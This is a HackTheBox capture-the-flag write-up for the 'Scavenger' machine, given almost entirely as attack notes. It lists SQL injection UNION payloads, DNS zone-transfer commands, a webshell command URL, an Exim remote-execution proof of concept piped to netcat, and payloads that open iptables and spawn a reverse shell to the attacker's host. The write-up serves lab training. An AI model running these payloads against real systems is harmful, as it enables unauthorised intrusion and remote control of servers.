Scavenger @ HackTheBox

29Feb

Scavenger @ HackTheBox

By CTF , , ,

Scavenger is a 40 Point machine on hackthebox that involves a lot of enumeration, a SQL injection, and in my video, an unintended root by exploiting exim.

Notes

SQL injection:

') UNION (SELECT (SELECT GROUP_CONCAT(table_schema, table_name  SEPARATOR " | ") FROM information_schema.tables where table_schema != "information_schema"), 2) #

') UNION (SELECT (SELECT GROUP_CONCAT(table_schema, table_name, column_name SEPARATOR " | ") FROM  information_schema.columns where table_schema != "information_schema"), 2) #

') UNION (SELECT (SELECT GROUP_CONCAT(id, domain SEPARATOR " / ") FROM  whois.customers), 2) #

Vhosts:

supersechosting.htb, justanotherblog.htb, pwnhats.htb, rentahacker.htb

Zonetransfer:

dig axfr @scavenger.htb supersechosting.htb
dig axfr @scavenger.htb justanotherblog.htb
dig axfr @scavenger.htb pwnhats.htb
dig axfr @scavenger.htb rentahacker.htb

Webshell:

http://sec03.rentahacker.htb/shell.php?hidden=dpkg+-l+|grep+exim

Exim PoC:

(sleep 0.1 ; echo HELO foo ; sleep 0.1 ; echo 'MAIL FROM:<>' ; sleep 0.1 ; echo 'RCPT TO:<${run{PAYLOAD}}@localhost>' ; sleep 0.1 ; echo DATA ; sleep 0.1 ; echo "Received: 1" ; echo "Received: 2" ;echo "Received: 3" ;echo "Received: 4" ;echo "Received: 5" ;echo "Received: 6" ;echo "Received: 7" ;echo "Received: 8" ;echo "Received: 9" ;echo "Received: 10" ;echo "Received: 11" ;echo "Received: 12" ;echo "Received: 13" ;echo "Received: 14" ;echo "Received: 15" ;echo "Received: 16" ;echo "Received: 17" ;echo "Received: 18" ;echo "Received: 19" ;echo "Received: 20" ;echo "Received: 21" ;echo "Received: 22" ;echo "Received: 23" ;echo "Received: 24" ;echo "Received: 25" ;echo "Received: 26" ;echo "Received: 27" ;echo "Received: 28" ;echo "Received: 29" ;echo "Received: 30" ;echo "Received: 31" ;echo "" ; echo "." ; echo QUIT) | nc 127.0.0.1 25

Exim payloads

/bin/sh -c "iptables -I INPUT 1 -j ACCEPT"
/bin/sh -c "iptables -I OUTPUT 1 -j ACCEPT"
/bin/sh -c "nc <lhost> 4141 -e /bin/sh"

Send exploit (hex encode payload, paste into PoC, then base64 encode everything and replace “payload” below):

echo+<payload>|base64+-d|sh

Share this post

Author

Related Posts

23May

Rope @ HackTheBox

Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the... read more

25May

Luke @ HackTheBox

Luke is a rather short, easy machine on hackthebox, which was nonetheless fun to solve and our team got both... read more

20Nov

LDAP, WebDAV, LAPS & Unintended Solutions – Hutch @ PG Practice

We are solving Hutch from PG-Practice. For user, we will get credentials from LDAP & use them to upload a... read more

25Jan

AI @ HackTheBox

AI is a 30 point machine on hackthebox that involves SQL injection via speech and abusing an exposed java debugging... read more

09Sep

SEH Based Buffer Overflow & DLL Hijacking – UT99 @ PG Practice

We are solving UT99, an intermediate windows box on PG Practice. On this box, we are going to exploit an... read more

16Jan

Lab – Rainbow Walkthrough

Rainbow is a medium difficulty machine that involves a SEH-based buffer overflow for user and a UAC bypass for root. read more

21Nov

Buff @ HackTheBox

Buff is a 20-point Windows Machine on HackTheBox, created by egotisticalSW. It involves 2 simple public exploits and forwarding a... read more

03Aug

Safe @ HackTheBox

Safe is an "easy" machine on hackthebox, involving a simple buffer overflow and cracking a keepass file. read more

18May

Ellingson @ HackTheBox

Ellingson is fun and quick 40 points machine on hackthebox, featuring the abuse of the python/flask werkzeug debugger, cracking a... read more

29May

XSS, Deserialization & SeImpersonate – Cereal @ HackTheBox

We are solving Cereal, a 40-point machine on HackTheBox. For user, we will exploit a pretty tricky deserialization vulnerability in... read more